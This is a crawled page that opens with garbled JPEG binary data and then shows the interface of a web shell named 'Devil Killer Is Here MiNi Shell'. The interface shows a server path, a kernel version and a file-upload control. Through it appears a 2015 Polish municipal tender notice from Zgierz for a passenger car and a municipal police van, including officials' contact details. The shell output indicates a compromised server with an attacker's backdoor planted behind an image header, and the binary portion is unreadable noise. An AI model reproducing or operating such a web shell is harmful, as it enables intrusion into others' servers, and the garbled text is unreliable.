JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151021/153813-N-2015.html

<p class="kh_header"><b>Zgierz: Dostawa samochodu osobowego na potrzeby Urzędu Miasta Zgierza oraz samochodu specjalnego na potrzeby Straży Miejskiej w Zgierzu</b><br>
<b>Numer ogłoszenia: 153813 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Zgierz , Plac Jana Pawła II 16, 95-100 Zgierz, woj. łódzkie, tel. 0427162854 w. 200, 7143200, faks 042 7143203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodu osobowego na potrzeby Urzędu Miasta Zgierza oraz samochodu specjalnego na potrzeby Straży Miejskiej w Zgierzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa dwóch samochodów, fabrycznie nowych, tj.:
- samochodu osobowego na potrzeby Urzędu Miasta Zgierza - część I zamówienia
- samochodu specjalnego na potrzeby Straży Miejskiej w Zgierzu - część II zamówienia
CZĘŚĆ I
PARAMETRY SAMOCHODU NA POTRZEBY URZĘDU MIASTA ZGIERZA:
1. Rok produkcji: 2015.
2. Homologacja osobowa, samochód segmentu D, nadwozie typu hatchback - pięcioro drzwi.
3. Norma emisji spalania min. Euro 6.
4. Silnik benzynowy  turbodoładowany.
5. Pojemność silnika min. 1500 cm3, tolerancja - 5%,  moc min.160 KM. 
6. Emisja CO2 nie wyższa niż 134 g/km.
7. Podgrzewana szyba przednia.
8. Długość całkowita min. 4800 mm.
9. Pojemność bagażnika min. 530 litrów
10. Zużycie benzyny w mieście max. 7,8 l/100km.
11. Zużycie benzyny  poza miastem max. 4,6 l/100km.
12. Średnie zużycie benzyny  max. 5,8 l/100km, zużycie energii - 1,86 MJ/km
13. Skrzynia biegów min. 6 biegowa + bieg wsteczny, manualna.
14. Kolor nadwozia czarny - lakier metalizowany.
15. Przyciemniane szyby w tylnej części nadwozia.
16. Rolety przeciwsłoneczne zintegrowane w tylnych drzwiach.
17. Czujniki parkowania z tyłu i z przodu.
18. Kolor tapicerki czarny.
19. Przednie fotele podgrzewane z regulacją temperatury.
20. Felgi aluminiowe min. 17 cali. 
21. System monitorowania ciśnienia w oponach.
22. Koło dojazdowe na wyposażeniu.
23. Dwa komplety kół (w sumie, z zamontowanymi): z oponami letnimi i zimowymi.
24. Radioodtwarzacz CD zdalnie sterowany na kierownicy, ekran dotykowy  min 5 cali 
z wbudowanym zestawem głośnomówiącym w technologii Bluetooth.
25. Reflektory dostosowujące poziom oświetlenia do otoczenia oraz kierunku jazdy.
26. System ABS, kontroli trakcji, tempomat. 
27. Poduszki powietrzne kierowcy i pasażera: czołowe i boczne.
28. Poduszki powietrzne - boczne kurtyny powietrzne dla przedniego i tylnego rzędu foteli.
29. Poduszka powietrzna chroniąca kolana kierowcy.
30. Centralny zamek sterowany pilotem.
31. Lusterko wsteczne samoczynnie ściemniające się.
32. Lusterka boczne elektryczne, podgrzewane i składane automatycznie.
33. Immobiliser.
34. Autoalarm.
35. Elektrycznie sterowane szyby w przednich i tylnych bocznych drzwiach.
36. Dywaniki podłogowe welurowe oraz drugi komplet gumowych.
37. Komputer pokładowy.
38. Wspomaganie układu hamulcowego i kierowniczego.
39. Klimatyzacja automatyczna dwustrefowa. 
40. Gwarancja podstawowa min. 2 letnia bez limitu kilometrów.
41. Gwarancja na powłokę lakierowaną min. 2 lata.
42. Gwarancja na perforację nadwozia min. 10 lat.
43. Gwarancja realizowana na terenie całej Unii Europejskiej w autoryzowanych punktach producenta. 
44. Wykonawca, na czas naprawy gwarancyjnej, dostarczy w miejsce wskazane przez Zamawiającego (również poza granicami Rzeczpospolitej Polskiej) samochód zastępczy, o specyfikacji nie gorszej, niż wskazana w opisie przedmiotu zamówienia i ofercie Wykonawcy.
45. Wykonawca w dniu odbioru samochodu przekaże Zamawiającemu książkę gwarancyjną, upoważniającą do serwisu gwarancyjnego, świadectwo homologacji samochodu, kartę pojazdu, instrukcję obsługi w języku polskim oraz wszelkie inne dokumenty przewidziane w przepisach prawa powszechnie obowiązującego.
46. Wykonawca gwarantuje, że dostarczany samochód jest wykonany zgodnie z obowiązującymi normami, wolny od wad, w tym fizycznych - konstrukcyjnych, materiałowych, wykonawczych i prawnych, a ponadto spełnia warunki, o których mowa, w szczególności w ustawie Prawo o ruchu drogowym i przepisach wykonawczych do wskazanej ustawy. 
CZĘŚĆ II
PARAMETRY SAMOCHODU SPECJALNEGO NA POTRZEBY STRAŻY MIEJSKIEJ 
W ZGIERZU;
I. Silnik i skrzynia biegów:
1) moc nie mniejsza niż 95 KM - diesel;   
2) pojemność silnika nie mniejsza niż 1560 cm3;
3) skrzynia biegów minimum 5 biegowa, manualna ;
4) norma emisji spalania Euro 5.
II. Nadwozie:
1) wymiary:
a) wysokość pojazdu bez lampy zespolonej, nie mniejsza niż - 1830 mm,
b) długość całkowita pojazdu nie mniejsza niż - 4800 mm,
c) rozstaw osi pojazdu nie mniejszy niż - 3050 mm,
d) odległość pomiędzy przegrodą a tylnymi drzwiami w przedziale dla osób ujętych, mierzona na wysokości podłogi nie mniejsza niż - 1100 mm;
2) kolor lakieru - srebrny;
3) w kabinie pasażerskiej (drugi rząd siedzeń) przeszklone boczne drzwi lewe i prawe, przesuwane po obu stronach z szybami przyciemnianymi ograniczającymi widoczność z zewnątrz pojazdu;
4) w przedziale dla osób ujętych brak okien bocznych - blacha w kolorze nadwozia;
5) tylne drzwi dwuskrzydłowe przeszklone, pozbawione klamek od wewnątrz;
6) elektryczne opuszczane szyby w drzwiach przednich w kabinie dla kierowcy i pasażera;
7) okratowane od zewnątrz okna drzwi tylnych;
8) stopień tylny zintegrowany ze zderzakiem ułatwiający wsiadanie i wysiadanie osób zatrzymanych z zabezpieczeniem antypoślizgowym;
9) zabudowa przedziału dla osób ujętych zgodnie z wymaganiami niezbędnymi przy rejestracji pojazdu;
10) pojazd wyposażony w koła z oponami letnimi na stalowych obręczach o rozmiarze minimum 16 cali oraz dodatkowo komplet czterech kół z oponami zimowymi na stalowych obręczach o rozmiarze minimum 16 cali. 
III. Wnętrze pojazdu:
1. Kabina dla kierowcy i pasażera 
1) dwa fotele fabryczne z regulacją oparcia, zagłówkami i pasami bezpieczeństwa;
2) zamocowane dwa uchwyty na pałki służbowe;
2. Kabina dla pasażerów;
1) trzy fotele fabryczne z regulacją oparcia, zagłówkami i pasami bezpieczeństwa;
2) podłoga pokryta wykładziną antypoślizgową;
3) dodatkowy punkt świetlny;
3. Przedział dla osób ujętych i osób nietrzeźwych:
1) sztywna przegroda pomiędzy kabiną dla pasażerów a przedziałem dla osób ujętych i osób nietrzeźwych uniemożliwiająca przedostawanie się cieczy, zapachów lub innych zanieczyszczeń do wnętrza pojazdu;
2) w przegrodzie umieszczone okienko (lufcik) z szybą zabezpieczone kratą umożliwiające obserwację osób ujętych lub osób nietrzeźwych z kabiny pasażerskiej;
3) zamontowane dwa składane siedzenia tyłem do kierunku jazdy wykonane z tworzywa sztucznego z zamontowanymi dwoma uchwytami do zaczepiania kajdanek oraz dodatkowo wyposażone w dwa biodrowe pasy bezpieczeństwa;
4) podłoga wykonana z wykładziny antypoślizgowej i wodoodpornej, odpornej na uszkodzenia mechaniczne;
5) pozostałe elementy przedziału (ściany, sufit, przegroda) pokryte materiałem wodoodpornym i odpornym na uszkodzenia, umożliwiającym mycie wnętrza przedziału silnym strumieniem wody;
6) przedział w części sufitowej wyposażony w wentylację nawiewno - wywiewną, zabezpieczoną przed uszkodzeniem;
7)  trzyczęściowa stalowa przegroda wykonana z siatki lub kraty z jednoskrzydłowymi drzwiami otwieranym na zewnątrz, o szerokości minimum 800 mm, oddzielająca osoby ujęte i osoby nietrzeźwe od tylnych drzwi;
8)  drzwi stalowe przegrody zamykane na zamek, wyposażone dodatkowo w rygiel zabezpieczający uniemożliwiający zdjęcie i otworzenie tych drzwi przez osoby przewożone;
9) oświetlenie przedziału umieszczone w części sufitowej pomiędzy stalową przegrodą 
a drzwiami, zabezpieczone przed uszkodzeniem, oświetlające wnętrze przedziału oraz teren za samochodem przy otwartych drzwiach tylnych.
IV. Wyposażenie specjalistyczne pojazdu:
1) zamontowana w przedziale dla kierowcy i pasażera radiostacja bazowa (dostarczona przez zamawiającego), wraz z instalacją antenową;    
2) lampa zespolona z głośnikiem i napisem STRAŻ MIEJSKA zamontowana na dachu 
w przedniej części pojazdu, emitująca sygnały świetlne w kolorze niebieskim przy zastosowaniu źródła światła typu LED;
3) pojedyncza lampa emitująca sygnały świetlne w kolorze niebieskim przy zastosowaniu źródła światła typu LED, uruchamiana razem z lampą zespoloną;
4) zamontowane w przedziale dla kierowcy i pasażera generatora - syreny z mikrofonem służącego do podawania komunikatów głosowych oraz emitowania sygnałów dźwiękowych o zmiennym tonie (np. wilk, pies, le-on, mix), z możliwością sterowania urządzeniami zewnętrznym (np. lampy zespolone).
V. Oznakowanie zewnętrzne pojazdu:
1) oznakowanie zewnętrzne pojazdu zgodne z § 32b rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2015 r. poz. 305, z późn. zm.);
2) dodatkowo numer boczny pojazdu 103 barwy granatowej, umieszczony na drzwiach tylnych prawych i bokach pojazdu;
3) dodatkowo numer telefonu alarmowego 986 z symbolem graficznym słuchawki telefonicznej barwy granatowej, umieszczony na drzwiach tylnych lewych i bokach pojazdu.
VI. Dodatkowe wyposażenie pojazdu:
1) poduszka powietrzna dla kierowcy i pasażera;
2) system ABS;
3) klimatyzacja;
4) immobiliser;
5) radioodbiornik;
6) centralny zamek;
7) wspomaganie układu kierowniczego;
VII. Warunki gwarancyjne:
1) minimum 2 lata gwarancji na pojazd, bez limitu kilometrów;
2) minimum 6 lat gwarancji na perforacje blach,
3) minimum 2 lata gwarancji na wszystkie elementy konstrukcyjne i modyfikacje wprowadzone w samochodzie, zgodnie z wymaganiami Zamawiającego. Wykonawca będzie w tym zakresie gwarantem.
VIII. Dodatkowe obowiązki Wykonawcy.
1. Wykonawca, na czas naprawy gwarancyjnej, dostarczy do siedziby Zamawiającego  samochód zastępczy, o specyfikacji nie gorszej, niż wskazana w opisie przedmiotu zamówienia i ofercie Wykonawcy. Samochód zastępczy nie musi być pojazdem specjalnym, posiadać zmian konstrukcyjnych i modyfikacji wymaganych przez Zamawiającego.
2. Wykonawca w dniu odbioru samochodu przekaże Zamawiającemu książkę gwarancyjną, upoważniającą do serwisu gwarancyjnego, świadectwo homologacji samochodu, kartę pojazdu, instrukcję obsługi w języku polskim oraz wszelkie inne dokumenty przewidziane w przepisach prawa powszechnie obowiązującego.
3. Wykonawca gwarantuje, że dostarczany samochód jest wykonany zgodnie z obowiązującymi normami, wolny od wad, w tym fizycznych - konstrukcyjnych, materiałowych, wykonawczych i prawnych, a ponadto spełnia warunki, o których mowa, w szczególności w ustawie Prawo o ruchu drogowym i przepisach wykonawczych do wskazanej ustawy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-1, 34.11.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">formularz parametrów techniczno-eksploatacyjnych, prospekt/folder/katalog
potwierdzający spełnianie parametrów techniczno-eksploatacyjnych</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Średnie zużycie paliwa - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień zawartej umowy mogą nastąpić wyłącznie za zgodą Stron, wyrażoną w formie pisemnego aneksu, pod rygorem nieważności. 
2. Zmiany umowy będą możliwe wówczas, jeżeli: 
1) nie będą dotyczyły istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy albo 
2) będą dotyczyły istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, przy czym: 
a) okażą się korzystne dla Zamawiającego, przy czym korzystność zmiany 
rozpatrywana będzie przez Zamawiającego w ujęciu subiektywnym w odniesieniu 
do konkretnego stanu faktycznego i całokształtu praw i obowiązków Zamawiającego wynikających z zawartej umowy albo 
b) konieczność takich zmian wyniknie z okoliczności , których przy zachowaniu należytej staranności nie można było przewidzieć w chwili zawierania umowy, w szczególności w przypadkach: istotnej zmiany na rynku walutowym, istotnej zmiany na rynku ekonomicznym, istotnej zmiany prawa - zmiany przepisów powszechnie obowiązujących, itp.
3. Dokonanie zmian będzie, w szczególności możliwe w przypadku wystąpienia 
co najmniej jednej z okoliczności wymienionych poniżej:
1) w zakresie zmiany czasu realizacji zamówienia oraz terminów wynikających 
z harmonogramu Zamawiający, dopuszcza zmianę: 
a) jeżeli uzasadniona będzie okolicznościami leżącymi po stronie Zamawiającego, 
w szczególności sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi; 
b) gdy zaistnieje inna, niemożliwa do przewidzenia okoliczność prawna, ekonomiczna lub techniczna, za którą żadna Strona nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie ze specyfikacją istotnych warunków zamówienia; 
2) w zakresie zmian spowodowanych następującymi okolicznościami: 
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z specyfikacją istotnych warunków zamówienia, 
b) zmiana obowiązującej stawki VAT (zmiana stawki VAT dotyczyć będzie ceny, w części, jakiej dotyczą te zmiany przepisów), 
c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, 
d) zmiany uzasadnione okolicznościami, o których mowa w art. 357 ze znaczkiem 1 Kodeksu cywilnego. 
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, ale nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.umz.zgierz.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, pokój nr 219.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 09:00, miejsce: Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, PUNKT OBSŁUGI INTERESANTA (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.11.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: - w sprawach merytorycznych: 1) Robert Chocholski, Sekretarz Miasta Zgierza, pok. nr 106, tel.: (42) 714-31-47, 2) Dariusz Bereżewski, Komendant Straży Miejskiej w Zgierzu, ul. ks. Popiełuszki 3a, tel.: (42) 716-18-44, - w sprawach proceduralnych: 1) Zofia Zamojska, gł. specjalista i 2) Lech Dąbski, naczelnik, pok. 219, tel.: (42) 714-32-00 oraz 3) Ewa Stasiak, inspektor, pok. 220, tel.: (42) 714-32-34. Postępowanie o udzielenie zamówienia prowadzi się z zachowaniem formy pisemnej. Zamawiający dopuszcza, aby oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane były przez Wykonawców i Zamawiającego nie tylko w podstawowej formie pisemnej, ale również faksem albo pocztą elektroniczną, przy czym: a) jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem albo pocztą elektroniczną - każda ze Stron, na 